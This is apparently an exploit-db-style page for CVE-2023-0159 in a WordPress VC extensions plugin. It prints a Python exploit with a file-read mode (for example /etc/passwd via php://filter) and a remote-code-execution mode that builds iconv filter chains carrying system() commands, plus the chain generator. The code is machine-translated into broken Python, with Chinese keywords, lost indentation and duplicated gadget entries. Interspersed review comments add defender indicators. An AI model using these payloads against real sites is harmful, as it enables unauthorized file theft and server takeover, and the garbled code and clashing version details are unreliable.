
WPBakery页面构建器1.9.0的广泛的VC插件- 远程代码执行(RCE)

#exploit title: WPBakery页面构建器1.9.1-未经身份验证的RCE
#DATE: 2025年3月12日
#利用作者: Ravina
#供应商主页: wprealize
#版本: 1.9.1
#测试平台: Windows, Linux
#CVE ID : CVE-2023-0159
#漏洞类型:远程代码执行
---------------------------------------------------------------------
#CVE-2023-0159_SCAN.PY
#!/usr/bin/env Python3
#lfi:/exploit.py-mode lfi -target https://vuln-site.com -file/etc/passwd
#rce:/exploit.py -mode rce -target https://vuln-site.com -command'ID' - generator/path/path/path/path/php_filter_chain_generator.py.pypy
导入argparse
导入请求
导入基础64
导入子过程
进口时间
导入php_filter_chain_generator
def run_lfi(target,file_path):
# LFI mode: ask the plugin's admin-ajax action to load a "template" whose
# name is a php://filter URI, and print the base64 content it returns.
#
# NOTE(review): as printed on this page the body is machine-translated
# (Python keywords rendered in Chinese, indentation lost, some names
# garbled), so it does not run as-is; treat it as a description of the
# request, not as a working tool.
#
# Request shape (defender's view): POST {target}/wp-admin/admin-ajax.php,
# action=extension_vc_init_shortcode_pagination, options[template] set to a
# php://filter URI wrapping the requested path. A template parameter whose
# value is a stream wrapper or a filesystem path, rather than a plugin
# template name, is the thing to alert on and the thing a server-side
# allow-list of template names would reject.
url=f'{target}/wp-admin/admin-ajax.php'
有效载荷={
'action':'extension_vc_init_shortcode_pagination',
'options [template]': f'phph: //filter/convert.base64-encode/resource={file_path}'
}
TRY:
响应=requests.post(url,data=有效载荷)
# Status/marker check on the response; this line is truncated on this page.
如果响应。STATUS_CODE==200和'{'status':'success','Message':'Items已加载','data':'
TRY:
# On success the JSON body carries a base64 field under 'data'; it is
# decoded and printed as the file contents.
json_data=reverse.json()
BASE64_CONTENT=JSON_DATA ['DATA'] ['项目']
解码=base64.b64decode(base64_content).decode()
打印(f'\ n [+]成功读取{file_path} : \ n')
打印(解码)
除异常外,E:
# Decoding failed: show the first 500 characters of the raw body instead.
打印(f'[ - ]解码失败: {str(e)}')
打印(f'raw响应(截断): {response.text [:500]} .')
其他:
print(f'[ - ] lfi失败(status: {response.status_code})')')
除异常外,E:
# Network/transport error on the POST itself.
打印(f'[ - ]请求失败: {str(e)}')
def run_rce(target,命令,generator_path):
# RCE mode: same admin-ajax parameter as run_lfi, but options[template] is a
# php://filter chain produced by an external generator script rather than a
# plain base64-encode filter.
#
# NOTE(review): machine-translated on this page (keywords in Chinese,
# indentation lost, several variable names garbled); not runnable as-is.
#
# Defender's view: the request still targets admin-ajax.php with the same
# action, and the template value starts with php://filter/ followed by a long
# run of convert.iconv.* filters — that prefix is a reliable log/WAF
# indicator regardless of the command carried.
# base64-encode the command so special characters survive the wrapping
encoded_cmd=base64.b64encode(command.encode())。decode()
php_code=f'?php system(base64_decode('{encoded_cmd}'));
# generate the filter chain by running the generator script as a subprocess
TRY:
结果=subprocess.run(
[generator_path,' - 链',php_code],
capture_output=true,
text=true,
检查=true

# The generator prints several lines; the first one starting with the
# filter prefix is taken as the payload.
有效载荷=无
对于result.stdout.split('\ n'):
如果line.startswith('ph: //filter'):
有效载荷=line.strip()
休息
如果不是有效的:
打印('[ - ]无法生成有效载荷')
返回
url=f'{target}/wp-admin/admin-ajax.php'
data={'action':'Extistion_vc_init_shortcode_pagination','选项[template]':有效载荷}
print(f'[*]发送有效载荷for Command: {command}')
start_time=time.time()
# send the request; the generator path must have been passed in by the caller
响应=requests.post(url,data=data)
大量=time.time() - start_time
# Only timing, status code and the first 1000 characters of the body are shown.
print(f'\ n [+]响应时间: {elapsed:2f}秒')
print(f'[+]状态码: {response.status_code}')
if antsphy.status_code==200:
打印('\ n [+]响应content:')
print(reversys.text [:1000] +('.'如果Len(wif wifs.text)1000 else''))
除subprocess.calledprocesserror外
# Generator exited non-zero (check=true): surface its stderr.
print(f'[ - ]过滤链生成器失败: {e.stderr}')
除了FilenotFoundError:
# generator_path does not point at an existing file.
在{generator_path}'上找不到print(f'[ - ]生成器)
除异常外,E:
print(f'[ - ] rce失败: {str(e)}')
def main():
# CLI entry point: --mode selects lfi or rce, --target is the base URL
# (trailing slashes are stripped before use), --file / --command are the
# mode-specific arguments, --generator is the path to the chain generator
# used only by rce mode. Machine-translated on this page; not runnable as-is.
parser=argparse.argumentparser(description='cve-2023-0159 exploit脚本')
parser.add_argument(' - mode',选择=['lfi','rce'],必需=true,help='exploit mode')
parser.add_argument(' - target',必需=true,help='target url(例如3https://Example.com)')
parser.add_argument(' - file',help='lfi模式的文件路径')
parser.add_argument(' - 命令',help='命令执行RCE模式')
parser.add_argument(' - generator',默认='php_filter_chain_generator.py',
help='通往php_filter_chain_generator.py的路径')
args=parser.parse_args()
如果args.mode=='lfi':
# lfi mode requires --file; exit early with a message otherwise.
如果不是args.file:
打印('[ - ]丢失- lfi模式的文件参数')
返回
run_lfi(args.target.rstrip('/'),args.file)
elif args.mode=='rce':
# rce mode requires --command; exit early with a message otherwise.
如果不是args.command:
打印('[ - ]丢失- RCE模式的命令参数')
返回
run_rce(args.target.rstrip('/'),args.command,args.generator)
# Script entry guard (garbled on this page; the intent is the usual
# __name__ == '__main__' check calling main()).
如果name=='__ -Main __':
主要的()
----------------------------------------------------------
#php_filter_chain_generator.py
#!/usr/bin/env Python3
导入argparse
导入基础64
导入
# no need to guess a valid filename: the chain is resolved against php://temp
file_to_use='php: //temp'
# Per-character gadget table: maps one base64-alphabet character (digits,
# letters, '/', '+', '=') to a '|'-separated sequence of convert.iconv.*
# filters. generate_filter_chain below appends one entry per input character.
#
# NOTE(review): as printed on this page the table has repeated keys and
# several truncated or run-on entries, so it is not a faithful copy of the
# upstream generator — do not build detections or IoCs from these exact
# strings; the stable indicator is the php://filter/convert.iconv prefix.
转换={
'0':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.ucs2.ucs2.utf8 | convert.iconv.8859_3.ucs2',
'1':'convert.iconv.iso888597.utf16 | convert.iconv.rk1048.ucs-4le | convert.iconv.utf32.cp1167 | convert.iconv.cp9066.csucs4',
'2':'convert.iconv.l5.utf-32 | convert.iconv.iso888594.gb13000 | convert.iconv.cp949.utf32be | convert.iconv.iso_69372.csibm921',
'3':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.iso6937.8859_4 | convert.iconv.ibm868.utf-16le',
'4':'convert.iconv.cp866.csunicode | convert.iconv.csisolatin5.iso_6937-2 | convert.iconv.cp950.utf-16be',
'5':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.utf16.euctw | convert.iconv.8859_3.ucs2',
'6':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.csibm943.ucs4 | convert.ICONV.IBM866.UCS-2',
'7':'convert.iconv.851.utf-16 | convert.iconv.l1.t.618bit | convert.ICONV.ICONV.ISO-IR-103.850 | CONST.ICONV.PT154.UCS4',
'8':'convert.iconv.iso2022kr.utf16 | convert.iconv.l6.ucs2',
'9':'convert.iconv.csibm1161.unicode | convert.iconv.iso-ir-156.Johab',
'a':'convert.iconv.8859_3.utf16 | convert.iconv.863.shift_jisx0213',
'a':'convert.iconv.cp1046.utf32 | convert.iconv.l6.ucs-2 | convert.iconv.utf-16le.t.61-8bit | convert.iconv.865.ucs-4le',
'b':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000',
'b':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.ucs-2.osf00030010 | convert.iconv.csibm1008.utf32be',
'c':'convert.iconv.utf8.csiso2022kr',
'c':'convert.iconv.l4.utf32 | convert.iconv.cp1250.ucs-2',
'd':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.ibm932.shift_jisx0213',
'd':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.gbk.big5',
'e':'convert.iconv.ibm860.utf16 | convert.iconv.iso-ir-143.iso2022cnext',
'e':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.utf16.euc-jp-ms | convert.iconv.iso-8859-1.iso_6937',
'f':'convert.iconv.l5.utf-32 | convert.iconv.iso88594.gb13000 | convert.iconv.cp950.shift_jisx0213 | convert.iconv.uhc.johab'
'f':'convert.iconv.cp367.utf-16 | convert.iconv.csibm901.shift_jisx0213',
'g':'convert.iconv.se2.utf-16 | convert.iconv.csibm921.naplps | convert.iconv.855.cp936 | convert.iconv.ibm-932.utf-8',
'g':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90',
'h':'convert.iconv.cp1046.utf16 | convert.iconv.iso6937.shift_jisx0213',
'h':'convert.iconv.csgb2312.utf-32 | convert.iconv.ibm-1161.ibm932 | convert.iconv.gb13000.utf16be | convert.iconv.864.utf-32le',
'i':'convert.iconv.l5.utf-32 | convert.iconv.iso888594.gb13000 | convert.iconv.big5.big5.shift_jisx0213',
'I':'convert.iconv.dec.utf-16 | convert.iconv.iso8859-9.iso_6937-2 | convert.iconv.utf16.gb13000',
'j':'convert.iconv.863.unicode | convert.iconv.isiri3342.ucs4',
'j':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000 | convert.iconv.big5.johab | convert.iconv.cp950.utf16',
'k':'convert.iconv.863.utf-16 | convert.iconv.iso6937.utf16le',
'k':'convert.iconv.js.unicode | convert.iconv.l4.ucs2',
'l':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.r9.iso6937 | convert.iconv.osf00010100.uhc',
'l':'convert.iconv.cp-ar.utf16 | convert.iconv.8859_4.big5hkscs | convert.ICONV.MSCP1361.UTF-32LE | CONST.ICONV.ICONV.IBM932.UCS-2BE',
'M':'convert.iconv.cp869.utf-32 | convert.iconv.macuk.ucs4 | convert.iconv.utf16be.866 | convert.iconv.macukrainian.wchar_t',
'M':'convert.iconv.se2.utf-16 | convert.iconv.csibm921.naplps | convert.iconv.cp11633.csa_t500 | convert.iconv.ucs-2.ucs-2.mscp949',
'n':'convert.iconv.cp869.utf-32 | convert.iconv.macuk.ucs4',
'n':'convert.iconv.iso888594.utf16 | convert.iconv.ibm5347.ucs4 | convert.iconv.utf32be.ms936 | convert.iconv.osf000100044.t.61',,
'o':'convert.iconv.csa_t500.utf-32 | convert.ICONV.CP857.ISO-2022-JP-3 | convert.iconv.iso20222jp2.cp7777777777777777777,
'o':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.ucs-4le.osf05010001 | convert.iconv.ibm912.utf-16le',
'p':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.ms932.ms936 | convert.iconv.big5.johab',
'p':'convert.iconv.ibm891.csunicode | convert.iconv.iso88859-14.iso6937 | convert.iconv.big-five.ucs-4',
'q':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.gbk.cp932 | convert.iconv.big5.ucs2',convert.iconv.cp932
'q':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.csa_t500-1983.ucs-2be | convert.iconv.mik.mik.ucs2',
'r':'convert.iconv.pt.utf32 | convert.iconv.koi8-u.ibm-932 | convert.iconv.sjis.eucjp-win | convert.iconv.l10.ucs4',
'r':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.iso-ir-99.ucs-2be | convert.iconv.l4.osf000101011',
's':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.gbk.sjis',
's':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90',
't':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.csa_t500.l4 | convert.iconv.iso_88859-2.iso-ir-ir-103',
't':'convert.iconv.864.utf32 | convert.iconv.ibm912.naplps',
'u':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943',
'u':'convert.iconv.cp1162.utf32 | convert.iconv.l4.t.61',
'v':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000 | convert.iconv.big5.johab',
'v':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.utf16.euctw | convert.iconv.iso-88859-14.ucs2',ucs2',
'w':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.ms932.ms936',
'w':'convert.iconv.mac.utf16 | convert.iconv.l8.utf16be',
'x':'convert.iconv.pt.utf32 | convert.iconv.koi8-u.ibm-932',
'x':'convert.iconv.cp-ar.utf16 | convert.iconv.8859_4.big5hkscs',
'y':'convert.iconv.cp367.utf-16 | convert.iconv.csibm901.shift_jisx0213 | convert.iconv.uhc.cp1361',
'y':'convert.iconv.851.utf-16 | convert.iconv.l1.t.618bit',
'z':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.big5hkscscs.utf16',
'z':'convert.iconv.865.utf16 | convert.iconv.cp901.iso6937',
'/':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.ucs2.ucs2.utf-8 | convert.iconv.csisolatin6.ucs-4',
'+':'convert.iconv.utf8.utf16 | convert.iconv.windows-1258.utf32le | convert.iconv.isiri3342.iso-ir-157',
'=':''
}
def generate_filter_chain(链,debug_base64=false):
# Build a php://filter URI from a base64 string: a fixed prefix, one
# gadget-table entry per input character (the last character is skipped,
# see the slice below), then a decode/re-encode pair and a final decode
# unless debug_base64 is set. Returns the URI as a string, resolved against
# the module-level file_to_use.
#
# NOTE(review): machine-translated on this page (keywords in Chinese,
# indentation lost, the loop line garbled); not runnable as-is. The output
# always starts with 'php://filter/' and ends with '/resource=' + file_to_use,
# which is what request-log matching should key on.
encoded_chain=链
# generate some junk base64
filters='convert.iconv.utf8.csiso2022kr |'
过滤器+='convert.base64-consode |'
# make sure to get rid of any equal signs in the string we just generated and the rest of the file
过滤器+='convert.iconv.utf8.utf7 |'
# one table entry per character, excluding the last one
对于concoded_chain [:-1] :中的c
过滤器+=转换[C] +'|'
# decode and re-encode to get rid of everything that is not valid base64
过滤器+='convert.base64-decode |'
过滤器+='convert.base64-consode |'
# get rid of the equal signs
过滤器+='convert.iconv.utf8.utf7 |'
如果不是debug_base64:
# don't add the final decode when debugging the chain
过滤器+='convert.base64-decode'
final_payload=f'php: //filter/{filters}/resource={file_to_use}'
返回final_payload
def main():
# CLI for the generator: --chain takes raw content to encode (base64 with
# '=' padding stripped, then passed to generate_filter_chain); --rawbase64
# takes an already-base64 value, validated against the base64 alphabet, and
# produces a debug chain (debug_base64=true) that leaves the base64 in place.
# Machine-translated on this page; not runnable as-is.
# parse command-line arguments
parser=argparse.argumentparser(description='php filter链生成器。')
parser.add_argument(' - 链',help='您要生成的内容。
parser.add_argument(' - rawbase64',help='您要测试的base64值,链条将由php打印为base64,可用于调试。',必需=false)
args=parser.parse_args()
如果args.chain不是没有:
# Encode the content, strip '=' padding, then build and print the chain.
链=args.chain.encode('utf-8')
base64_value=base64.b64encode(链).decode('utf-8')。替换('=','')
链=generate_filter_chain(base64_value)
打印('[+]以下小工具链将生成以下代码: {}(base64 value: {})'。格式(args.chain,base64_value))
印刷(链)
如果args.rawbase64不是没有:
# Padding is stripped first; the regex then rejects anything outside the
# base64 alphabet and the script exits with status 1.
rawbase64=args.rawbase64.replace('=','')
match=re.search('^([a-za-z0-9+/])*$',rawbase64)
如果(匹配):
链=generate_filter_chain(rawbase64,true)
印刷(链)
其他:
打印('[ - ] base64字符串。')
出口(1)
# Script entry guard (garbled on this page; the intent is the usual
# __name__ == '__main__' check calling main()).
如果name=='__ -Main __':
主要的()
 